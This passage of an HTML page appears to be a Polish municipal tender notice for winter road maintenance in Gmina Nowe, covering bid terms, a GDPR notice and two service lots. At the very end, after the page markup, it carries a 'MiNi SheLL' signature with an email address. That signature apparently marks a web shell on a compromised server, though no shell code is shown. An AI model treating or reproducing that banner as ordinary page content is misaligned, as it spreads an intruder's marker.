umowy.4.	Zmiany terminu realizacji zamówienia ( rozpoczęcia terminu realizacji zamówienia) w sytuacji, kiedy na skutek wydłużającej się procedury przetargowej nie będzie możliwe podpisanie umowy z wykonawcę w terminie do 1 grudnia 2018 r. W takiej sytuacji rozliczenie za niepełne miesiąc świadczenia usług odbywać się będzie proporcjonalnie do dni, w których świadczona była usługa. 5.	Zmiana umowy wymaga aneksu do umowy. </span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania">Tajemnica przedsiębiorstwa:1)	jeżeli według Wykonawcy oferta będzie zawierała informacje objęte tajemnicą jego przedsiębiorstwa w rozumieniu przepisów ustawy z 16 kwietnia 1993r. o zwalczaniu nieuczciwej konkurencji (Dz.U. z 2003r. nr 153, poz. 1503, z późn. zm.), muszą być oznaczone klauzulą NIE UDOSTĘPNIAĆ-TAJEMNICA PRZEDSIĘBIORSTWA. Zaleca się umieścić takie dokumenty na końcu oferty (ostatnie strony w ofercie lub osobno) oraz podanie w formularzu ofertowym, które strony oferty objęte są tajemnicą przedsiębiorstwa, 2)	Zamawiający nie ujawni informacji stanowiących tajemnice przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli Wykonawca, nie później niż w terminie składania ofert zastrzeże, że nie mogą być one udostępniane oraz wykaże, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy. </span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-11-26</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Zgodnie z art.13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z04.05.2016,str.1), dalej ,,RODO", jeżeli w toku niniejszego postępowania Wykonawca udostępni Zamawiającemu swoje dane osobowe lub dane innych osób, w których jest posiadaniu informuję, że:- administratorem danych osobowych jest Gmina Nowe, Plac Św. Rocha 5, 86 - 170 Nowe, tel. 523337210,- inspektorem ochrony danych osobowych w Gminie Nowe jest Pani Agnieszka Stawicka, e-mail: inspektor@cbi24.pl, - dane osobowe przetwarzane będą na podstawie art.6 ust.1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn: ,,Wykonanie usługi polegającej na zimowym utrzymaniu dróg i ulic na terenie miasta i Gminy Nowe w okresie od 01.12.2018 do 31.03.2019." znak sprawy IKS.271.17.2018.MC prowadzonym w trybie przetargu nieograniczonego,- odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie Dokumentacja postępowania w oparciu o art. 8 oraz art.96 ust. 3 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych (Dz.U. z 2017r. poz. 1579 i 2018), dalej ,,ustawa Pzp",- dane osobowe będą przechowywane, zgodnie z art.97 ust.1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy,- obowiązek podania danych osobowych (jeśli zajdzie taka potrzeba) bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje niepodania określonych danych wynikają z ustawy Pzp,- w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.22 RODO,- osoba, w której posiadaniu danych osobowych jest Zamawiajacy ma prawo:a) na podstawie art.15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,b) na podstawie art.16 RODO prawo do sprostowania Pani/Pana danych osobowych( skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników),c) na podstawie art.18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art.18 ust. 2 RODO ( prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego),d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, ze przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO,- osobie nie przysługuje:a) w związku z art.17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,prawo do przenoszenia danych osobowych, o którym mowa w art.20 RODO,b) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust.1 lit.c RODO</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Wykonanie usługi polegającej na zimowym utrzymaniu dróg i ulic na terenie Gminy Nowe w okresie od 01.12.2018 do 31.03.2019 - strefa I i II .</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest wykonanie usługi polegającej na zimowym utrzymaniu dróg i ulic na terenie Gminy Nowe w okresie od 01.12.2018 do 31.03.2019r., przy czym w ostatnich 7 dniach realizacji przedmiotu zamówienia Wykonawca zobowiązany zostanie do wykonania czynności związanych z posprzątaniem po akcji zima. Pod pojęciem posprzątania po akcji zima rozumie się, zebranie i usunięcie użytego w ,,akcji zimowej" piasku ze wszystkich chodników oraz usuniecie skrzyń z piaskiem. 1. Podział Gminy na strefy.Teren Gminy Nowe został podzielony na trzy strefy kolejności oczyszczania ulic z śniegu i usuwania gołoledzi: I strefa - dotyczy miasta Nowe - Skrzyżowania: ulic Leśnej z Myśliwską, ulicy Wiatracznej z Myśliwską, ulice Wiślana i Rybaki, Komierowskiego z krajową E 91, Komierowskiego z Kolejową.- Podjazdy: ul. Owocowa , ul. Nowy Świat - podjazd przy ZESI, Podgórna - Schody przy ulicy: Leśnej, Brzozowej, Podgórnej, Obywatelskiej, Garbuzy, Spacerowej, Ślusarskiej, Nad Skarpą, Wierzbowa- Aleja 3-go Maja, Aleja 3-go Maja + Przejście przez teren Targowiska do ul. Dworcowej oraz od Jeziora Czarownic do Osiedla Myśliwskiego, schody od posterunku Policji do ul. Podgórnej. - Chodniki do odśnieżania i usuwania gołoledzi: ul. Bydgoska prawa i lewa strona, ul. Bydgoska i przy Parku, Kolejowa i Aleja 3-go Maja przy cmentarzu, ul. Kolejowa, ul. Nowa, cały plac rynku wraz chodnikami (wg wskazań Zamawiającego), ul. Wojska Polskiego - plac parkingowy, obwodnica o/m Nadwiślańskie II, Tczewska prawa i lewa strona do wjazdu na o/m Myśliwskie, Pl. Św. Rocha, Gdańska -amfiteatr, ul. Tczewska od parkingu przy J. Czarownic do drogi gminnej na osiedlu w Bochlinie oraz ul. Bydgoska od Posterunku Policji za Zakłady Mięsne NOVE + za przejście dla pieszych. Chodnik przy ul. Komierowskiego. - Ulice: Gdańska, Rynek, Wojska Polskiego, Grudziądzka, Kościuszki, Zduńska, Gen. Komierowskiego, Kolejowa, Sportowa, Fabryczna, Nowa, Dworcowa, Aleja 3-go Maja, Nowy Świat, Owocowa, Wiatraczna, ulice wokół Hali Widowiskowo- Sportowej, Osiedle Jana Pawła wraz ulicami przyległymi, Hallera, Ślusarska, Obwodnica o/m Nadwiślańskie II strefa ulice - dotyczy miasta Nowe: Wąska, Poprzeczna, Kuchczyńskiego, Myśliwska, Zielona, Brzozowa, Jesionowa, Leśna, Modrzewiowa, Orzechowa, Cisowa, alejka za fabryka KLOSE oraz chodnik przy ul. Kolejowej wraz z chodnikiem od stadionu miejskiego do działek wzdłuż drogi wojewódzkiej, 1000-Lecia, 9-go Maja, Kniatek, Wiślana, os. Nowy Świat, Plac Zamkowy, Akacjowa, Droga Boczna, Cicha, Dębowa, Długa, Długie Ogrody, Garbuzy, Kasztanowa, Klonowa, Kościelna, Krótka, Kwiatowa, Lipowa, Łąkowa, Mroczna, Nad Skarpą, Obywatelska, Podgórna, Pod Murami, Przykop, Rybaki, Sosnowa, Spacerowa, Stanisława Wojnowskiego, Stroma, Szpitalna, Św. Huberta, Świerkowa, Targowisko, Tylna, Wierzbowa, Wodna, Wrzosowa, Zakątek, Zamkowa i trasy autobusów szkolnych w dni powszednie tj. od poniedziałku do piątku.2. Czas, w jakim w strefach I-II należy podjąć działania w przypadku usuwania skutków opadów śniegu i gołoledzi. Wykonawca zobowiązuje się przystąpić do usuwania śniegu i/lub likwidowania gołoledzi w miejscach określanych jako: I strefa odśnieżania zimowego - w ciągu 30 minut od momentu ustania opadów śniegu i/lub przyczyn powodujących gołoledź po uzgodnieniu z przedstawicielem Urzędu Gminy Nowe (Burmistrza Nowego lub Kierownika Referatu Inwestycji, Gospodarki Komunalnej i Ochrony Środowiska), II strefa odśnieżania zimowego- w ciągu 2 godzin od momentu ustania opadów śniegu i/lub przyczyn powodujących gołoledź po uzgodnieniu z przedstawicielem Urzędu Gminy Nowe (Burmistrza Nowego lub Kierownika Referatu Inwestycji, Gospodarki Komunalnej i Ochrony Środowiska), 3. Pozostałe warunki realizacji zamówienia. 1) Przez okres zimowy Wykonawca, który składa ofertę na I część zamówienia na terenie miasta ustawi 20 pojemników na piasek zmieszany z chlorkiem sodu przeznaczony do usuwania gołoledzi na skrzyżowaniach i strefie I i II według wskazań Zamawiającego i/lub według zaistniałych potrzeb. 2) Celem wyeliminowania gołoledzi należy: a) Plac Rynku wraz z chodnikami znajdującymi się w obrębie starego miasta przesypywać samym piaskiem (bez dodatku: chlorku sodu i/lub soli). b) Pozostałe jezdnie, ulice, skrzyżowania ulic przesypywać piaskiem z dodatkiem chlorku sodu lub solą (w zależności od potrzeb). Pod pojęciem zwalczanie gołoledzi rozumie się w szczególności zamarzanie cienkiej warstwy wody, tzw. zamarzanie kropel deszczu, mżawki na powierzchni oziębionego pasa drogowego do temperatury niższej lub nieco wyższej od 0o C.3) Na żądanie Zamawiającego Wykonawca usunie i wywiezie zalegający na parkingach i poboczach dróg śniegu, jeśli jego ilość spowoduje zakłócenie płynności ruchu w obu kierunkach i uniemożliwi parkowanie samochodów.4) Usuwanie śniegu i/lub gołoledzi z ciągów pieszych polegać ma na oczyszczeniu chodników przyległych do nieruchomości będących własnością Gminy Nowe z wyłączeniem chodników przyległych do nieruchomości w zarządzie administracji PUM Nowe przez zgarnięcie śniegu, posypywanie piaskiem likwidując gołoledź oraz skuwanie zadeptanego śniegu. 5) Wykonawca zobowiązany jest do prowadzenia ciągłej obserwacji sytuacji pogodowej oraz monitorowania stanu dróg i wydawania dyspozycji operatorom sprzętu po uzgodnieniu z upoważnionymi pracownikami UG Nowe (Burmistrz Nowego, Kierownik Referatu Inwestycji, Gospodarki Komunalnej i Ochrony Środowiska. 6) Wykonawca ponosi całkowitą odpowiedzialność za szkody wyrządzone osobom trzecim i Zamawiającemu, które powstały w wyniku wykonywanych lub nienależycie wykonanych prac przez Wykonawcę w czasie realizacji usługi. 7) Opróżnianie koszy ulicznych z odpadów komunalnych z terenu miasta należy przyjąć maksymalnie 2 razy w tygodniu.8) Wykonawca ma obowiązek znać i stosować w czasie prowadzenia usług wszelkie aktualne obowiązujące przepisy dotyczące ochrony środowiska, prawa o ruchu drogowym, o drogach publicznych, prawa budowlanego i inne związane z zakresem wykonywanych prac. 11. Zamawiający wskazuje miejsca składowania piasku użytego w akcji zimowej na terenie składowiska odpadów w Milewie lub inne (gm. Nowe). - Baza przy siedzibie Zarządu Pum Nowe ,Plac Św.Rocha 510)Bieżące oczyszczanie z liści, śniegu, lodu, błota nawierzchni dróg, chodników, placów, parkingów, przystanków komunikacji oraz kratek ściekowych wód opadowych w ulicach, jak również usuwanie zanieczyszczeń powstałych w wyniku zimowego utrzymania (piasku i innych środków używanych przeciwko gołoledzi).11) Wykonawca podczas realizacji przedmiotu zamówienia zobowiązany jest wywozić zebrane odpady (poza śniegiem) do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych.12) Zapewnienie dodatkowego sprzątania w mieście przed uroczystościami i świętami zgodnie z poleceniem Zamawiającego, o którym Wykonawca zostanie zawiadomiony przez Zamawiającego na 7 dni przed planowanymi uroczystościami oraz świętami (max do 4 razy w roku) - dotyczy tylko I części zamówienia.13) W celu prawidłowego sporządzenia oferty proponuje się wizję lokalną terenu, na którym realizowane ma być zamówienie. 14) W okresie obowiązywania umowy Wykonawca zobowiązany jest do wskazania osoby odpowiedzialnej za jej realizację w imieniu Wykonawcy. Wskazanie osoby powinno zawierać imię, nazwisko, stanowisko służbowe, kontaktowy numer telefonu oraz adres e-mail. Zmiana osoby nie stanowi zmiany umowy.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>90620000-9, 90630000-2, 90610000-6<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-03-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Aspekty środowiskowe</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Wykonanie usługi polegającej na zimowym utrzymaniu dróg i ulic na terenie Gminy Nowe w okresie od 01.12.2018 do 31.03.2019 - strefa III .</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest wykonanie usługi polegającej na zimowym utrzymaniu dróg i ulic na terenie Gminy Nowe w okresie od 01.12.2018 do 31.03.2019r., przy czym w ostatnich 7 dniach realizacji przedmiotu zamówienia Wykonawca zobowiązany zostanie do wykonania czynności związanych z posprzątaniem po akcji zima. Pod pojęciem posprzątania po akcji zima rozumie się, zebranie i usunięcie użytego w ,,akcji zimowej" piasku ze wszystkich chodników oraz usuniecie skrzyń z piaskiem. III strefa -pozostałe drogi gminne na terenach wiejskich gminy Nowe.2. Czas, w jakim w strefie III należy podjąć działania w przypadku usuwania skutków opadów śniegu i gołoledzi. Wykonawca zobowiązuje się przystąpić do usuwania śniegu i/lub likwidowania gołoledzi w miejscach określanych jako: III strefa odśnieżania zimowego- na wyraźne polecenie przedstawiciela Urzędu Gminy w Nowem (Burmistrz Nowego, Kierownik Referatu Inwestycji, Gospodarki Komunalnej i Ochrony Środowiska)3. Pozostałe warunki realizacji zamówienia. 1) Wykonawca, który składa ofertę na II część zamówienia w III strefie ustawi 5 pojemników na piasek zmieszany z chlorkiem sodu przeznaczony do usuwania gołoledzi według wskazań Zamawiającego i/lub według zaistniałych potrzeb. Wykonawca jest zobowiązany do systematycznego uzupełniania piasku w skrzyniach.2) Celem wyeliminowania gołoledzi należy: a) jezdnie, ulice, skrzyżowania ulic przesypywać piaskiem z dodatkiem chlorku sodu lub solą (w zależności od potrzeb). Pod pojęciem zwalczanie gołoledzi rozumie się w szczególności zamarzanie cienkiej warstwy wody, tzw. zamarzanie kropel deszczu, mżawki na powierzchni oziębionego pasa drogowego do temperatury niższej lub nieco wyższej od 0o C.3) Na żądanie Zamawiającego Wykonawca usunie i wywiezie zalegający na parkingach i poboczach dróg śniegu, jeśli jego ilość spowoduje zakłócenie płynności ruchu w obu kierunkach i uniemożliwi parkowanie samochodów.4) Usuwanie śniegu i/lub gołoledzi z ciągów pieszych polegać ma na oczyszczeniu chodników przyległych do nieruchomości będących własnością Gminy Nowe z wyłączeniem chodników przyległych do nieruchomości w zarządzie administracji PUM Nowe przez zgarnięcie śniegu, posypywanie piaskiem likwidując gołoledź oraz skuwanie zadeptanego śniegu. 5) Wykonawca zobowiązany jest do prowadzenia ciągłej obserwacji sytuacji pogodowej oraz monitorowania stanu dróg i wydawania dyspozycji operatorom sprzętu po uzgodnieniu z upoważnionymi pracownikami UG Nowe (Burmistrz Nowego, Kierownik Referatu Inwestycji, Gospodarki Komunalnej i Ochrony Środowiska. 6) Wykonawca ponosi całkowitą odpowiedzialność za szkody wyrządzone osobom trzecim i Zamawiającemu, które powstały w wyniku wykonywanych lub nienależycie wykonanych prac przez Wykonawcę w czasie realizacji usługi. 7) Opróżnianie koszy ulicznych z odpadów komunalnych z terenu miasta należy przyjąć maksymalnie 2 razy w tygodniu.8) Wykonawca ma obowiązek znać i stosować w czasie prowadzenia usług wszelkie aktualne obowiązujące przepisy dotyczące ochrony środowiska, prawa o ruchu drogowym, o drogach publicznych, prawa budowlanego i inne związane z zakresem wykonywanych prac. 9) Zamawiający wskazuje miejsca składowania piasku użytego w akcji zimowej na terenie składowiska odpadów w Milewie lub inne (gm. Nowe). - Baza przy siedzibie Zarządu Pum Nowe ,Plac Św.Rocha 510)Bieżące oczyszczanie z liści, śniegu, lodu, błota nawierzchni dróg, chodników, placów, parkingów, przystanków komunikacji oraz kratek ściekowych wód opadowych w ulicach, jak również usuwanie zanieczyszczeń powstałych w wyniku zimowego utrzymania (piasku i innych środków używanych przeciwko gołoledzi).11) Wykonawca podczas realizacji przedmiotu zamówienia zobowiązany jest wywozić zebrane odpady (poza śniegiem) do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych.12) W celu prawidłowego sporządzenia oferty proponuje się wizję lokalną terenu, na którym realizowane ma być zamówienie. 13) W okresie obowiązywania umowy Wykonawca zobowiązany jest do wskazania osoby odpowiedzialnej za jej realizację w imieniu Wykonawcy. Wskazanie osoby powinno zawierać imię, nazwisko, stanowisko służbowe, kontaktowy numer telefonu oraz adres e-mail. Zmiana osoby nie stanowi zmiany umowy.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>90620000-9, 90610000-6, 90630000-2<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-03-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Aspekty środowiskowe</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com